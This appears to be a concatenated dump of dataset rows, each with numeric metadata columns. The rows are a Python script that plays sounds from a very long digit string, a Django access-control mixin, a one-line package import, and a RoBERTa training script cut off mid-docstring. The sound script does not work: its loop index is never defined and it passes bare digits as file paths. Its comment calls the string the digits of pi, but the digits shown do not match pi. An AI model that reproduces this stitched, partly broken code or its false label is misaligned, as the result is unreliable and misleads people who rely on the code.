37476278521902412025699435347162266608936752198331118135111465038548950251206557726361454736044268594980743969323312971273771573470997139522911826534851555871373366291202427143025037632695013509116129529937858646813072264860082708813335381937036825988678933212383270532976258573827900978264605455985551318366888446282651337984916678394097613537662517982582496634587719501243840403591408492097337546424744881761840700235695801774101776969250778148933866725578985645898510568919609243988415692806969833522402256345704973122452693541938370048431833571965166267215755241934019330990183193091965829209696562476676836596470195957547393455143374137087615173236772042273856742791706982045499530959188724349395240944416789988463198455048523936629720797774528143994182567894577957125524268260899408633173715388962628896294021121088844273765686245276121303710173007851357154045330415079594477761435974378037424366469732471384104921243141389035790924160364063140381498314819052517209371039640268089948325722979545640427017577229041732347960736187878899133183058430693948259613187138164234672187308451338772190869751049428437693250249816566738162606159417682525099937416728839517440669325496534031014522253161890092353764863784828813442098700480962271712264074895719390029185733074601043607291909457679946149292904279816877294264877299528584346477753869069501489841339245403941446802636254021186143170312511175776428299146445334089209769616990983726523617687456058947049681701369749095230720826828878907301900182534258053434217059287139317379931424108526473909482845964180936141384758311361305761084623668372376959134926158245162215521348792441450417568480641206365201703863301295327776990231186480200675569056822950163549319923059142463962170253297475731140942201801993680350264956369558664259067626856873721103391567938398957655651931778830002416135395624377778408017488193730950206999008908993280883974303677365955248913001566332940779071396154645340887915103006513219344866732482759079468078798194250195826223
20395131252014109960531260696555404248670549986786923021746989009547850725672978794769888831093487464426400718183160331655511534276155622405474473378049246214952133258527698847336269182649174338987824789278468918828054669982303689939783413747587025805716349413568433929396068192061773331791738208562436433635359863494496890781064019674074436583667071586924521182997893804077137501290858646578905771426833582768978554717687184427726120509266486102051535642840632368481807287940717127966820060727559555904040233178749447346454760628189541512139162918444297651066947969354016866010055196077687335396511614930937570968554559381513789569039251014953265628147011998326992200066392875374713135236421589265126204072887716578358405219646054105435443642166562244565042999010256586927279142752931172082793937751326106052881235373451068372939893580871243869385934389175713376300720319760816604464683937725806909237297523486702916910426369262090199605204121024077648190316014085863558427609537086558164273995349346546314504040199528537252004957805254656251154109252437991326262713609099402902262062836752132305065183934057450112099341464918433323646569371725914489324159006242020612885732926133596808726500045628284557574596592120530341310111827501306961509835515632004310784601906565493806542525229161991819959602752327702249855738824899882707465936355768582560518068964285376850772012220347920993936179268206590142165615925306737944568949070853263568196831861772268249911472615732035807646298116244013316737892788689229032593349861797021994981925739617673075834417098559222170171825712777534491508205278430904619460835217402005838672849709411023266953921445461066215006410674740207009189911951376466904481267253691537162290791385403937560077835153374167747942100384002308951850994548779039346122220865060160500351776264831611153325587705073541279249909859373473787081194253055121436979749914951860535920403830235716352727630874693219622190064260886183676103346002255477477813641012691906569686495012688376296907
23396127628722304114181361006026404403003599698891994582739762411461374480405969706257676472376606554161857469052722923822827518679915698339074767114610302277660602006124687647772881909679161335401988140275799217416767879923160396356949285151363364721954061117176738737255572852294005436178517650230754469386930787349911035218253292972604455321079788771144989887091151123725060423875373484125708606406905205845212275453384800820530245045651766951857691320004281675805492481178051983264603244579282973012910531838563682120621553128866856495651261389226136706409395333457052698695969235035309422454386527867767302754040270224638448355323991475136344104405009233036127149608135549053153902100229959575658370538126196568314428605795669662215472169562087001372776853696084070483332513279311223250714863020695124539500373572334680709465648308920980153487870563349109236605755405086411152144148143463043727327104502776866195310785832333485784029716092521532609255893265560067212435946425506599677177038844539618163287961446081778927217183690888012677820743010642252463480745430047649288555340906218515365435547412547615276977266776977277705831580141218568801170502836527554321480348800444297999806215790456416195721278450892848980642649742709057912906921780729876947797511244730599140605062994689428093103421641662993561482813099887074529271604843363081840412646963792584309418544221635908457614607855856247381493142707826621518554160387020687698046174740080832434366538235455510944949843109349475994467267366535251766270677219418319197719637801570216993367508376005716345464367177672338758864340564487156696432104128259564534984138841289042068204700761559691684303899934836679354254921032811336318472259230555438305820694167562999201337317548912203723034907268106853445403599356182357631283776764063101312533521214199461186935083317658785204711236433122676512996417132521751355326186768194233879036546890800182713528358488844411176123410117991870923650718485785622102110400977699445312179502247957806950653
29659403839873699072407976790408267940076187295478359634927939045769736616434053597922192858705749574816966940623342726197335181366260637359825755524965098072601236682836059283418558480269584137725589708837899429105498003311138846034019391661221866960584915714857335682861495000190975911252188003964197621635593757437180114805594422987304181968080856472657135476128316292004498803154021055305970766663627493283089168809323592900817874119857383171926167288349184024297212904349655269427264025596414635259143484006758676903503823205729341329815935330444464968294413673234421583807616948312193331198190610961429522015361702985751055943264614685054526849757648078080092213358113781977492717685450755383287688744745915937311624706010912446098294248412875202244625944776387494919978404468292573609685345498432665368628444893657041118177938064416165312236002149187687694673984075171763075168498563592014868929431059402024579696229245666448819675762943495353263821716133957577907663707645695702597388004384158058943361371065518599876007549241872117148892952217377211460811543449826654798725800566747240511220073834592715757277152185899469481179406444663994323700442911407472181802248258377360173466853007449855647154200361235933973129144585915228874087195087086322188372882628228846318437172619033057771476515641438223067918473860391476831081413582757558536435977216500282778037134228696887873497950960311088991961433866640684506974207877002805093672033872326296378560386532164323488155575570184690890746478791224363755566686780676105449550172607911429308312857612544819444494732448190937953690082063846316782250648095318104065702543276043857035059228189198780658654121842992172737209551032422510797180778330426090867942734289557355592527238055114404380012390416877164451802264916816419274011064516224311017000566911217331894234005479596846698042980173625704067332821299621536848814041021944634246462207455756439604529853130714090846084996537678037932018991408658146621753193376659701143306086250098295669176
38846056762972931464911493704624469351984039534449135141193667933301936617663652555149174982307987072280860859626112660504289296966535652516688885572112276802772743708917389639772257564890533401038855931125679991516589025016486961427207005916056166159702451989051832969278935550303934681219761582183980483960562523091462638447386296039848924386187298507775928792722068554807210497817653286210187476766897248841139560349480376727036316921007350834073865261684507482496448597428134936480372426116704266870831925040997615319076855770327421785010006441984124207396400139603601583810565928413684574119102736420274163723488214524101347716529603128408658419787951116511529827814620379139855006399960326591248525308493690313130100799977191362230866011099929142871249388541612038020411340188887219693477904497527454288072803509305828754420755134816660927879353566521255620139988249628478726214432362853676502591450468377635282587652139156480972141929675549384375582600253168536356731379262475878049445944183429172756988376226261846365452743497662411138451305481449836311789784489732076719508784158618879692955819733250699951402601511675529750575437810242238957925786562128432731202200716730574069286869363930186765958251326499145950260917069347519408975357464016830811798846452473618956056479426358070562563281189269663026479535951097127659136233180866921535788607812759910537171402204506186075374866306350591483916467656723205714516886170790984695932236724946737583099607042589220481550799132752088583781117685214269334786921895240622657921043620348852926267984013953216458791151579050460579710838983371864038024417511347226472547010794793996953554669619726763255229914654933499663234185951450360980344092212206712567698723427940708857070474293173329188523896721971353924492426178641188637790962814486917869468177591717150669111480020759432012061969637795103227089029566085562225452602610460736131368869009281721068198618553780982018471154163630326265699283424155023600978046417108525537612728905335045506135
68414377585442967797701466029438768722511536380119175815402812081825560648541078793359892106442724489861896162941341800129513068363860929410008313667337215300835269623573717533073865333820484219030818644918409372394403340524490955455801640646076158101030176748847501766190869294609876920169120218168829104087070956095147041692114702741339005225334083481287035303102391969997859741390859360543359969707560446013424245368249609877258131102473279856207212657249900346829388687230489556225320446360263985422525841646432427161141981780248259556354490721922658386366266375083594431487763515614571074552801615967704844271419443518327569840755267792641126176525061596523545718795667317091331935876162825592078308018520689015150471334038610031005591481785211038475454293338918844412051794396997019411269511952656491959418997541839323464742429070271887522353439367363366320030723274703740712398256202466265197409019976245205619855762576000870817308328834438183107005451449354588542267857855191537229237955549433341017442016960009069641561273229777022121795186837635908225512881647002199234886404395915301846400471432118636062252701154112228380277853891109849020134274101412155976996543887719748537643115822983853312307175113296190455900793806427669581901484262799122179294798734890186847167650382732855205908298452980625925035212845192592798659350613296194679625237397256558415785374456755899803240549218696288849033256085145534439166022625777551291620077279685262938793753045418108072928589198971538179734349618723292761474785019261145041327487324297058340847111233374627461727462658241532427105932250625530231473875925172478732288149145591560503633457542423377916037495250249302235148196138116256391141561032684495807250827343176594405409826976526934457986347970974312449827193311386387315963636121862349726140955607992062831699942007205481152535339394607685001990988655386143349578165008996164907967814290114838764568217491407562376761845377514403147541120676016072646055685925779932207033733339891636950434
66906948284366299800374145276277165476238255461708831898108688068478537055364804693509588180253605297407935386765111950793732820831462689600710751755206144337841145499501364324463281933463890509365457145069008644834401804283633905135781572739733345372842633721740657757710798305175557210367959769018899584941301959995730179012401939086813565855396619413717944876320798688003716073032205474235722668968018821234243918859841689722776521940324932273147936692340048489760590379580946960417542796137825537812239476461478329269765451622902817011004378460387565441517394339600489153188175766505009516974024156447712936566142539493688842305174001299205568542898538979426699567770270891465137368922061044154816621568042198384767308717875902792091759006952734566820265133731115180001814341209626016586298210766635233617740078377834237091526440630540718078433580610729611055500204151316963730468492133568372654003075098290893646120478911147530370498939528334578240828173864413227100029683119402033234564208264732762338302946393789983758365545599193408662350909679611340048670271231765266637107787251118603540375544874186935197336566217723592293967764632515620234875701137957120962377234313702120310049651521119760131764194082034373485128526029133349151250831198028501778557107253731491392157091051309650598859999315608636554774035518981667335358800482146650997414337611827777233519107412175728415925808725913150746060256349037772633739144613770380213183474473011130326702969173350477016321066162278300272692833655840117914194478087482533607144032962522857750098085996090409363126356213281620714534061042241120830100085872642521122624801426475194261843258533867538740547434910727100497542811594660171361225904401589916002298278017960351940800465135347526987776095278399843680869089891978396935321799801391354425527179102253970108106321430485113782914985113819691430434975001899806816444121232733283071928243624067331965546926778511931527751134464689055042481133614349846048490512583456832664415284897139723760403
28212660253516693914082049947320486021627759791771234751097502403078935759937715095021751693555827072533911892334070223832077585802137174778378778391015234132098489423459613692340497998279304144463162707214796117456975719681239291913740982925805561955207434243295982898980529233366415419256367380689494201471241340525072204061794355252555225008748790086568314542835167750542294803274783044056438581591952666758282929705226127628711040134801787224801789684052407924360582742467443076721645270313451354167649668901274786801010295133862698649748212118629040337691568576240699296372493097201628707200189835423690364149270236961938547372480329855045112089192879829874467864129159417531675602533435310626745254507114181483239880607297140234725520713490798398982355268723950909365667878992383712578976248755990443228895388377317348941122757071410959790047919301046740750411435381782464630795989555638991884773781341347070246747362112048986226991888517456251732519341352038115863350123913054441910073628447567514161050410973505852762044489190978901984315485280533985777844313933883994310444465669244550885946314081751220331390681596592510546858013133838152176418210433429788826119630443111388796258746090226130900849975430395771243230616906262919403921439740270894777663702488155499322458825979020631257436910946393252806241642476868495455324938017639371615636847859823715902385421265840615367228607131702674740131145261063765383390315921943469817605358380310612887852051546933639241088467632009567089718367490578163085158138161966882222047570437590614338040725853862083565176998426774523195824182683698270160237414938363496629351576854061397342746470899685618170160551104880971554859118617189668025973541705423985135560018720335079060946421271143993196046527424050882225359773481519135438571253258540493946010865793798058620143366078825219717809025817370870916460452727977153509910340736425020386386718220522879694458387652947951048660717390229327455426785669776865939923416834122274663015062155320502655341
46099524935605085492175654913483095890653617569381763747364418337897422970070354520666317092960759198962773242309025239744386101426309868773391388251868431650102796491149773758288891345034114886594867021549210108432808078342808941729800898329753694064496990312539986391958160146899522088066228540841486427478628197554662927881462160717138188018084057208471586890683691939338186427845453795671927239797236465166759201105799566396259853551276355876814021340982901629687342985079247184605687482833138125916196247615690287590107273310329914062386460833337863825792630239159000355760903247728133888733917809696660146961503175422675112599331552967421333630022296490648093458200818106180210022766458040027821333675857301901137175467276305904435313131903609248909724642792845554991349000518029570708291905255678188991389962513866231938005361134622429461024895407240485712325662888893172211643294781619055486805494344103409068071608802822795968695013364381426825217047287086301013730115523686141690837567574763723976318575703810944339056456446852418302814810799837691851212720193504404180460472162693944578837709010597469321972055811407877598977207200968938224930323683051586265728111463799698313751793762321511125234973430524062210524423435373290565516340666950616589287821870775679417608071297378133518711793165003315552382248773065344417945341539520242444970341012087407218810938826816751204229940494817944947273289477011157413944122845552182842492224065875268917227278060711675404697300803703961878779669488255561467438439257011582954666135867867189766129731126720007297155361302750355616781776544228744211472988161480270524380681765357327557860250584708401320883793281600876908130049249147368251703538221961903901499952349538710599735114347829233949918793660869230137559636853237380670359114424326856151210940425958263930167801712866923928323105765885171402021119695706479981403150563304514156441462316376380990440281625691757648914256971416359843931743327023781233693804301289262637538266779503416933432
36075002481757418087503884750949394548962097404854426356371649959499209808842947903636662975260032438563529458447289445471662092974954966168774141208821304770228161164560440072363515811497297392189667373826472047226422212420165601502849713063327958143025160136948255670147809357908896571349261581613469018069650895563101212184918058479227206918716963163300448580201028606578585912699746376617414639341595695395542033146280265189511679380745733157598460861737026878676029436777805002446733913324316698803540732323882818475010516413311895370364884226902704780527424906034920829547550540034571601840725745369381455311753542107265578356154998744474804273234578800618731493415660463529797794550753593047956872093167245365472083816858556060438019770307642460834898761013457093948770029461757920619525492557571090385251714885252656710453498134198033906415298763436954202560802776144219143189213939088345431317696851018401038444723489488695209819435319065065553546173358140455448378847525262539496658699920584176527801253410338964698186424300341467913806190280596078548880107897055169462152287730901044674624979799926271209516847795684825833414022664772108433624375937416105367340419547389641978954253350363018614009515347669614762556518738232924685473569358028960115367917873035531593783630822486151777705415775765617593585120166929431111388635821596676188303261041646517148469793854226216871614001223782137797741312689772667129920259220174087700769562834739322010881593562862819285635718933849588506038531581797606794798408783609759601497334205727046035217906056476032855692762734951822032361441125841824262477120120357763888959743182328278713146080535335744942976217967890345681698895535185044783256163807094769516990862471000197488092050095219436323787197648703392238115403634754886268459561597551937654101150140670012269274743938885899438597302454148010612359080362745852884935632515853843832424932526660875889083187007091002373771065769850564339288543376583425967506537150053335144899082938877373520514
59333049626531415141386124437935885070944688045486975358170212908490787347806814366323322819415827345671356443171537967818058195852464840084032909981943781718177302317003989733050495387356116261023999433259780126893432605584710278764901070923443884634011735556865903585244919370181041626208504299258697435817098133894045934471937493877624232409852832762266604942385129709453245586252103600829286649724174919141988966129558076770979594795306013119159011773943104209049079424448868513086844493705909026006120649425744710353547657859242708130410618546219881830090634588187038755856274911587375421064667951346487586771543838018521348281915812462599335160198935595167968932852205824799421034512715877163345222995418839680448835529753361286837225935390079201666941339091168758803988828869216002373257361588207163516271332810518187602104852180675526648673908900907195138058626735124312215691637902277328705410842037841525683288718046987952513073266340278519059417338920358540395677035611329354482585628287610610698229721420961993509331312171187891078766872044548876089410174798647137882462153955933333275562009439580434537919782280590395959927436913793778664940964048777841748336432684026282932406260081908081804390914556351936856063045089142289645219987798849347477729132797266027658401667890136490508741142126861969862044126965282981087045479861559545338021201155646979976785738920186243599326777689454060508218838227909833627167124490026761178498264377033002081844590009717235204331994708242098771514449751017055643029542821819670009202515615844174205933658148134902693111517093872260026458630561325605792560927332265579346280805683443921373688405650434307396574061017779370141424615493070741360805442100295600095663588977899267630517718781943706761498217564186590116160865408635391513039201316805769034172596453692350806417446562351523929050409479953184074862151210561833854566176652606393713658802521666223576132201941701372664966073252010771947931265282763302413805164907174565964853748354669194523580
31530196916048099460681490403781982973236093008713576079862142542209641900436790547904993007837242158195453541837112936865843055384271762803527912882112930835157565659994474178843838156514843422985870424559243469329523282180350833372628379183021659183618155421715744846577842013432998259456688455826617197901218084948033244878725818377480552226815101137174536841787028027445244290547451823467491956418855124442133778352142386597992598820328708510933838682990657199461490629025742768603885051103263854454041918495886653854504057132362968106914681484786965916686184275679846004186876229805556296304595322792305161672159196867584952363529893578850774608153732145464298479231051167635774949462295256949766035947396243099534331040499420967788382700271447849406903707324910644415169605325656058677875741747211082743577431519406075798356362914332639781221894628744779811980722564671466405485013100965678631488009030374933887536418316513498254669467331611812336485439764932502617954935720430540218297487125110740401161140589991109306249231281311634054926257135672181862893278613883371802853505650359195274140086951092616754147679266803210923746708721360627833292238641361959412133927803611827632410600474097111104814000362334271451448333464167546635469973149475664342365949349684588455152415075637660508663282742479413606287604129064491382851945640264315322585862404314183866959063324506300039221319264762596269151090445769530144405461803785750303668621246227863975274666787012100339298487337501447560032210062235802934377495503203701273846816306102657030087227546296679688089058712767636106622572235222973920644309352432722810085997309513252863060110549791564479184500461804676240892892568091293059296064235702106152464620502324896659398732493396737695202399176089847457184353193664652912584806448019652016283879518949933675924148562613699594530728725453246329152911012876377060557060953137752775186792329213495524513308986796916512907384130216757323863757582008036357572800275449032795307990079944254110872
56931880146679355958346764328688769666100973957499678365933978463469599489506104903836474095046952260638580467580730699122904740898791668721171475276447116044019527181695082897335371485309289370463844208932997711258568408466083399340456890267875160087754612679880154658565220612109534907967073655397025761994313766399606060611064069593308281718764260435734253617569437848484952501082664883951597004905983808121052211110919433239511360514464598342107990580820937164645231277040231600721385437234612672609978703856570919985075956346132484601884098501942876879022687345565005191215465440638292538512763176639220509383452043007730170299403626154340013227639109129883278639204123004455516840548898090807791746360924393349126411642400938807463566072623366958427645836982687348158819610585718357674620096505260659292635482914990457683072108932458570737016607173981944850288426039636607460311847862258310565808708703055675958613417007454029656876347741764310517510367328692455585820823720386017817394051751304379948688223200443780431031709210342616749980000730160948145863744887785222730763304953839443453827706087607635420984450083062476302535727810327834617669705442871553153400164970766571959850417481990872014908756860377835919947193433527729472855379257876848323011018593658007172911869676176550537750302930338307064489128114120255061508964110076238245744886551825810581403453201247547232690875475070785776597325428444593530449920700145387489482265564422236963655441942254413382122254774975354946248276805333369832841561386923634433585538684711114304982483989918031654586382893537991305352228334301379533729540162576232280811384994918761441413229337671065634925288145282395062090223578766846501166600973827536604054469416534222390521083145858470355293522199282727605748212660652913855303455497445514703449394868634294596584310241907859236802245607639367841662705185551787029040735573046206396924533077957822459497104201880430001838814290081730394505073427870131244668600927785818110409115117293748736278
87874907465285565434748886831064110051023020875107768918781525622735251550379532444857787277617001964853703555167655209119339343762866284619844026295252183678522367475108809781507098978413086245881522660963551401874495836926917799047120726494905737264286005211403581231076006699518536124862746756375896225299116496066876508261734178484789337295056739007878617925351440621045366250640463728815698232317500596261080921955211150859302955654967538862612972339914628358476048627627027309739202001432248707582337354915246085608210328882974183906478869923273691360048837436615223517058437705545210815513361262142911815615301758882573594892507108879262128641392443309383797333867806131795237315266773820858024701433527009243803266951742119507670884326346442749127558907746863582162166042741315170212458586056233631493164646913946562497471741958354218607748711057338458433689939645913740603382159352243594751626239188685307822821763983237306180204246560477527943104796189724299533029792497481684052893791044947004590864991872727345413508101983881864673609392571930511968645601855782450218231065889437986522432050677379966196955472440585922417953006820451795370043472451762893566770508490213107736625751697335527462302943031203596260953423574397249659211010657817826108745318874803187430823573699195156340957162700992444929749105489851519658664740148225106335367949737142510229341882585117371994499115097583746130105505064197721531929354875371191630262030328588658528480193509225875775597425276584011721342323648084027143356367542046375182552524944329657043861387865901965738802868401894087672816714137033661732650120578653915780703088714261519075001492576112927675193096728453971160213606303090542243966320674323582797889332324405779199278484633339777737655901870574806828678347965624146102899508487399692970750432753029972872297327934442988646412725348160603779707298299173029296308695801996312413304939350493325412355071054461182591141116454534710329881047844067780138077131465400099386306481266614330858206
81139583831916954555825942689576984142889374346708410794631893253910696395578070602124597489829356461356078898347241997947856436204209461341238761319886535235831299686226894860840845665560687695450127448663140505473535174687300980632278046891224682146080672762770840240226615548502400895289165711761743902033758487784291128962324705919187469104200584832614067733375102719565399469716251724831223063391932870798380074848572651612343493327335666447335855643023528088392434827876088616494328939916639921048830784777704804572849145630335326507002958890626591549850940797276756712979501009822947622896189159144152003228387877348513097908101912926722710377889805396415636236416915498576840839846886168437540706512103906250612810766379904790887967477806973847317047525344215639038720123880632368803701794930895490077633152306354837425681665336160664198003018828712376748189833024683637148830925928337590227894258806008728603885916884973069394802051122176635913825152427867009440694235512020156837777885182467002565170850924962374772681369428435006293881442998790530105621737545918267997321773502936892806521002539626880749809264345801165571588670044350397650532347828732736884086354000274067678382196352222653929093980736739136408289872201777674716811819585613372158311905468293608323697611345028175783020293484598292500089568263027126329586629214765314223335179309338795135709534637718368409244442209631933129562030557551734006797374061416210792363342380564685009203716715264255637185388957141641977238742261059666739699717316816941543509528319355641770566862221521799115135563970714331289365755384464832620120642433801695586269856102246064606933079384785881436740700059976970364901927332882613532936311240365069865216063898725026723808740339674439783025829689425689674186433613497947524552629142652284241924308338810358005378702399954217211368655027534136221169314069466951318692810257479598560514500502171591331775160995786555198188619321128211070944228724044248115340605589595835581523201218460582056359
26993034788511320686266275887714460359966561084307256965005630644891875994665967728471715395736121081808415472731426617489331341746326623542220726001460127012069346395205644455432916629866607830890681187900908152950636267820756143888157813511346953663038784120923469428687308393204323338727754968052103028215443247233888452153437272501285897476914608083144041258681815400491877722878698018534545370065266556491709154295227567092222174741120627206566229898060328916720687436549482461086973672255474048128892424718543236057534116728507575520571311566979545848873987422281358879858407831350605482905514827852948911219053831956242287194847594078593980479010941940706717644390327307121358873850499936388382055016834027774960702768448802819122206368886368110435695293006521955282615269912716372773884189932871305634646882273982887631986457098363089177864870866761854856800476725526754147428510281458074031529921978145577568436811101853174981670164266478840902626828244482580275320945499151045185177165463118049045679857132575281179136562781581112888165622858760308759749638494352756766121689592614850307853620452745077529506310124803418045840594329260798544356200937080918215239203717906781219922804960697382387433126267303067959439609549571895772179155973005886936468455766760924509060882022122357192545367151918348725874239194108904441159599327600445065562064611646556654875942473692523369559930303550958176261762318495619064948396730020377638743693439998294302091470736189479326927624451865602395590537051289781634554233201149759948962784243274837880327014186769526211809750064051497558896502930048676052080104915378854139094245316917199876289412772211294645682948602814931815602496778879498137772162293594378110044480607976724292762495107841534464291508427645200020427694706980417758322090970202916573472515829046309103590378429775726517208772447409522671663060054697163879431711968734846887381866567512792985750163634113146275304990191356468238043299706957701507893377286580357127909137674208056554936
24646412600243796845437773390264725128194163200768487362517640659675406936217588793078559164787772747392720029103429495624476613082007292507345291707642266210476730378631699542374551174565220227833240968035246676631908610112067458562873174135111622920788651329412448154716281820798771683463413223622341177882310276598251093588923591620551087632980879931651725289380012378174348968321515905624933473702068322321001186373957705674738671021732123752243252416263580343762536068086691635715945515278178039217743228234366337728111863905118930759016666507429527583840085446354193171905313636597249051584091065822018147347990223590671381469051160519223012694823161134174399447148330408624842691395023367134124251238640266572581309439676219396554073865242298978797821986379182997095579247473203032391164104459069079778623155183495930353059237898175158914576504080251094791234217584828418819501385461656803017550355800549448948848713516053755934023457489795166024423383214060300959371055884570525157042662846003544028236787685509826781617655203757956554816778960389274983556087915411777494235734007641610932940038999821992672570869573260687749742248020233075251876502559684207606932299885875798988964607443817881700815488952265167228340452772191069914157646394852311267947308658031950764551976756289574288817968120900263871452578583152776151090886317402436956805678730152354278047934142664952238337071175112653755039423720987846680491394734465307140796225972871305030772587148755705025825734668666138023514260561161974055434365486980054448792959702875903522584097826835986664465860456942413907290952662499329029734405681606838057266260572770884070734714960600645614540707344327825140874742755067223048453570060922143900029929816082117170479176145051910081326703752149307405678533111060583529127810073917499491978451129159136811073940551752080196305393507402485095537725003670546651623304304250874423242624046321150789973369299854070416562610419767002024150948924118560924096376044296120023645907064497706272079
19019235964807048923636979860198283087284228564752353162882791324295524814447505521909672046080689545181712204930321853740627247421519740305769043602686360780792004776232429551829473522027244376339027721392087767065716241639751785859254426923428535274328856336850789651962072519416556061870370550218462845434257850383000095374518292958440464918838685793483961151297160581665745096703677495836666693121'
# NOTE(review): endless playback loop over the digits of pi (the very long
# string literal assigned just above this fragment).
while True:
    # BUG(review): `i` is never bound or incremented anywhere in this loop,
    # so either a NameError is raised or the *same* digit is replayed
    # forever — presumably this was meant to advance through `pi`. Confirm
    # against the (cut-off) setup code above.
    sound=str(pi[i])
    # NOTE(review): SND_FILENAME makes PlaySound treat `sound` as a *.wav
    # file path; a bare digit such as "3" is not a valid path. Possibly the
    # intent was per-digit files like "3.wav" — TODO confirm.
    winsound.PlaySound(sound, winsound.SND_FILENAME)
| 12,822.5
| 102,403
| 0.999474
| 28
| 102,580
| 3,661.607143
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.998537
| 0.000302
| 102,580
| 7
| 102,404
| 14,654.285714
| 0.001229
| 0
| 0
| 0
| 0
| 0
| 0.998586
| 0.998284
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
8e4b88e62a8eedfba02a02f71f8c2a7d0e3cfa42
| 254
|
py
|
Python
|
codershq/challenge/mixin.py
|
saeedhassan/CodersHQ
|
6c029c8f3f4507d02b6253aae87ec64cf8b7e04b
|
[
"MIT"
] | null | null | null |
codershq/challenge/mixin.py
|
saeedhassan/CodersHQ
|
6c029c8f3f4507d02b6253aae87ec64cf8b7e04b
|
[
"MIT"
] | null | null | null |
codershq/challenge/mixin.py
|
saeedhassan/CodersHQ
|
6c029c8f3f4507d02b6253aae87ec64cf8b7e04b
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
class AdminStaffRequiredMixin(LoginRequiredMixin, UserPassesTestMixin):
    """View mixin that admits only authenticated staff members or superusers.

    ``LoginRequiredMixin`` redirects anonymous users first; ``test_func``
    then gates the remaining authenticated users.
    """

    def test_func(self):
        # Either flag on the authenticated user is sufficient for access.
        user = self.request.user
        return user.is_superuser or user.is_staff
| 36.285714
| 78
| 0.822835
| 28
| 254
| 7.357143
| 0.75
| 0.359223
| 0.145631
| 0.165049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110236
| 254
| 6
| 79
| 42.333333
| 0.911504
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.5
| 0.25
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
6d1b8f7571a27ffaa5de8b3c169a6d3d5f99cd1b
| 143
|
py
|
Python
|
tests/TestingHelper/__init__.py
|
rmetcalf9/EllucainEthosPythonClient
|
6913322b1e583f655f67399f2baa763833583c27
|
[
"MIT"
] | 1
|
2021-02-09T22:05:50.000Z
|
2021-02-09T22:05:50.000Z
|
tests/TestingHelper/__init__.py
|
rmetcalf9/EllucainEthosPythonClient
|
6913322b1e583f655f67399f2baa763833583c27
|
[
"MIT"
] | 1
|
2020-07-02T11:44:54.000Z
|
2020-07-02T11:45:38.000Z
|
tests/TestingHelper/__init__.py
|
rmetcalf9/EllucainEthosPythonClient
|
6913322b1e583f655f67399f2baa763833583c27
|
[
"MIT"
] | 1
|
2021-01-13T21:35:11.000Z
|
2021-01-13T21:35:11.000Z
|
from .GenerateSampleResponses import getPersonMockResult, getMimimumResourceMockResult, getPersonNotFoundMockResult, getPersonHoldMockResult
| 35.75
| 140
| 0.909091
| 7
| 143
| 18.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062937
| 143
| 3
| 141
| 47.666667
| 0.970149
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6d4d71d1d8e78070d5ece21f5c1bb7d089bbd766
| 16,235
|
py
|
Python
|
RoBERTa/train_and_eval.py
|
nlx-group/Commonsense-Reasoning-Neuro-only-vs-Neuro-Symbolic-Methods
|
eba0a333d92b8b8faf09158d0104b5296dfd2e38
|
[
"MIT"
] | 7
|
2021-10-30T03:44:53.000Z
|
2021-11-24T08:18:38.000Z
|
RoBERTa/train_and_eval.py
|
nlx-group/Shortcutted-Commonsense-Reasoning
|
b65de0b5ca54e9baf0db68a1a6e5b51940a65001
|
[
"MIT"
] | null | null | null |
RoBERTa/train_and_eval.py
|
nlx-group/Shortcutted-Commonsense-Reasoning
|
b65de0b5ca54e9baf0db68a1a6e5b51940a65001
|
[
"MIT"
] | null | null | null |
from argparse import Namespace
import logging
import os
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from pytorch_lightning.loggers import TensorBoardLogger
from models import (
RobertaForARCT,
RobertaForBinaryARCT,
RobertaForPIQA,
RobertaForMultipleChoicePIQA,
RobertaForARC,
RobertaForRankingARC,
RobertaForCSQA,
)
LOG = logging.getLogger(__name__)
# Sentinel distinguishing "this task has no data_path parameter" from an
# explicit data_path=None passed by a caller.
_MISSING = object()


def _train_and_eval(
    model_cls,
    roberta_name,
    num_classes,
    do_train,
    do_test,
    load_from_checkpoint,
    epochs,
    learning_rate,
    weight_decay,
    lr_schedule,
    warmup_ratio,
    gradient_accumulation_steps,
    seed,
    model_name,
    batch_size,
    max_seq_len,
    log_path,
    checkpoint_path,
    save_top_k,
    use_early_stop,
    early_stop_metric,
    early_stop_patience,
    early_stop_mode,
    data_path=_MISSING,
):
    """Shared train/evaluate driver behind every public ``train_and_eval_*``.

    Builds the hyper-parameter ``Namespace``, instantiates the model (or
    restores it from ``load_from_checkpoint``), wires up checkpointing,
    TensorBoard logging and optional early stopping, then runs
    ``trainer.fit`` and/or ``trainer.test``.

    :param model_cls: Lightning module class to instantiate.
    :param roberta_name: Name used for checkpoint filenames and the logger.
    :param num_classes: Size of the task's classification head.
    :param data_path: Forwarded to the model only for tasks that take one
        (the ARCT/PIQA variants); omitted entirely when left at the
        ``_MISSING`` sentinel.
    The remaining parameters mirror the public wrappers unchanged.
